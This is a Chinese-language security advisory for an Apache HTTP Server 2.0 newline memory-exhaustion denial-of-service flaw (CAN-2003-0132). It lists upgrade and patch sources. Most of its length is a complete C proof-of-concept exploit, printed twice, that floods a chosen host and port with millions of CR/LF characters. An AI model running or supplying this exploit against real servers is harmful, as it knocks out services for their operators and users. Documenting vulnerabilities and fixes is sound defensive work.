Apache Web Server换行内存分配拒绝服务漏洞发布时间:2003-04-02 更新时间:2003-04-11 严重程度:中 威胁程度:远程拒绝服务 错误类型:竞争条件 利用方式:服务器模式 BUGTRAQ ID:7254 CVE(CAN) ID:CAN-2003-0132 受影响系统 Apache Software Foundation Apache 2.0 a9详细描述 Apache服务程序在处理大量换行符请求时存在问题,可导致内存泄露,而引起系统资源耗竭。 当攻击者提交大量换行字符的HTTP请求时,服务程序会对每个换行符分配8个字节而没有任何限制,或检查,到最后消耗完系统资源,导致服务程序崩溃。 测试代码 /* Version 2 */ /******** th-apachedos.c ******************************************************** * * * Remote Apache DoS exploit * * ------------------------- * * Written as a poc for the: * * * * iDEFENSE Security Advisory 04.08.03: * * http://www.idefense.com/advisory/04.08.03.txt * * Denial of Service in Apache HTTP Server 2.x * * April 8, 2003 * * * * This program sends 8000000 \n's to exploit the Apache memory leak. * * Works from scratch under Linux, as opposed to apache-massacre.c . * * * * * * Daniel Nystr鰉 <exce@netwinder.nu> * * * * - www.telhack.tk - * * * ******************************************************** th-apachedos.c ********/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h> int main(int argc, char *argv[]) { int sockfd; int count; char buffer[8000000]; struct sockaddr_in target; struct hostent *he; if (argc != 3) { fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit."); fprintf(stderr, "\n----------------------------------------------"); fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]); exit(-1); } printf("\nTH-Apache DoS\n"); printf("-------------\n"); printf("-> Starting...\n"); printf("->\n"); // memset(buffer, '\n', sizeof(buffer)); /* testing */ for (count = 0; count < 8000000;) { buffer[count] = '\r'; /* 0x0D */ count++; buffer[count] = '\n'; /* 0x0A */ count++; } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname() failed "); exit(-1); } memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(atoi(argv[2])); target.sin_addr = *((struct in_addr *)he->h_addr); printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n"); if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket() failed "); exit(-1); } if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0) { perror("connect() failed "); exit(-1); } printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n"); if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer)) { perror("send() failed "); exit(-1); close(sockfd); } close(sockfd); printf("-> Finished smoothly, check hosts apache...\n\n"); } /* EOF - th-apachedos.c * http://www.telhack.tk */ /* Version 2 */ /******** th-apachedos.c ******************************************************** * * * Remote Apache DoS exploit * * ------------------------- * * Written as a poc for the: * * * * iDEFENSE Security Advisory 04.08.03: * * http://www.idefense.com/advisory/04.08.03.txt * * Denial of Service in Apache HTTP Server 2.x * * April 8, 2003 * * * * This program sends 8000000 \n's to exploit the Apache memory leak. * * Works from scratch under Linux, as opposed to apache-massacre.c . * * * * * * Daniel Nystr鰉 <exce@netwinder.nu> * * * * - www.telhack.tk - * * * ******************************************************** th-apachedos.c ********/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h> int main(int argc, char *argv[]) { int sockfd; int count; char buffer[8000000]; struct sockaddr_in target; struct hostent *he; if (argc != 3) { fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit."); fprintf(stderr, "\n----------------------------------------------"); fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]); exit(-1); } printf("\nTH-Apache DoS\n"); printf("-------------\n"); printf("-> Starting...\n"); printf("->\n"); // memset(buffer, '\n', sizeof(buffer)); /* testing */ for (count = 0; count < 8000000;) { buffer[count] = '\r'; /* 0x0D */ count++; buffer[count] = '\n'; /* 0x0A */ count++; } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname() failed "); exit(-1); } memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(atoi(argv[2])); target.sin_addr = *((struct in_addr *)he->h_addr); printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n"); if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket() failed "); exit(-1); } if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0) { perror("connect() failed "); exit(-1); } printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n"); if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer)) { perror("send() failed "); exit(-1); close(sockfd); } close(sockfd); printf("-> Finished smoothly, check hosts apache...\n\n"); } /* EOF - th-apachedos.c * http://www.telhack.tk */ 解决方案 升级程序: Apache Software Foundation Apache 2.0 a9: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.28: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.32: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.35: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.36: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.37: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.38: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.39: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.40: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Red Hat Upgrade httpd-2.0.40-11.3.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/httpd-2.0.40-11.3.i386.rpm Red Hat Upgrade httpd-2.0.40-21.1.i386.rpm ftp://updates.redhat.com/9/en/os/i386/httpd-2.0.40-21.1.i386.rpm Red Hat Upgrade httpd-devel-2.0.40-11.3.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/httpd-devel-2.0.40-11.3.i386.rpm Red Hat Upgrade httpd-devel-2.0.40-21.1.i386.rpm ftp://updates.redhat.com/9/en/os/i386/httpd-devel-2.0.40-21.1.i386.rpm Red Hat Upgrade httpd-manual-2.0.40-11.3.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/httpd-manual-2.0.40-11.3.i386.rpm Red Hat Upgrade httpd-manual-2.0.40-21.1.i386.rpm ftp://updates.redhat.com/9/en/os/i386/httpd-manual-2.0.40-21.1.i386.rpm Red Hat Upgrade mod_ssl-2.0.40-11.3.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/mod_ssl-2.0.40-11.3.i386.rpm Red Hat Upgrade mod_ssl-2.0.40-21.1.i386.rpm ftp://updates.redhat.com/9/en/os/i386/mod_ssl-2.0.40-21.1.i386.rpm Apache Software Foundation Apache 2.0.41: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.42: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.43: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.44: Apache Software Foundation Upgrade Apache httpd 2.0.45 http://www.apache.org/dist/httpd/ Apache Software Foundation Patch denial_of_service_fix.patch http://www.apache.org/dist/httpd/patches/apply_to_2.0.44/denial_of_service_fix.patch 相关信息 参考:http://www.securityfocus.com/advisories/5261 http://www.securityfocus.com/advisories/5266 http://www.securityfocus.com/archive/1/317776 http://www.securityfocus.com/archive/1/318306 相关主页:http://www.apache.org/dist/httpd/Announcement2.html |
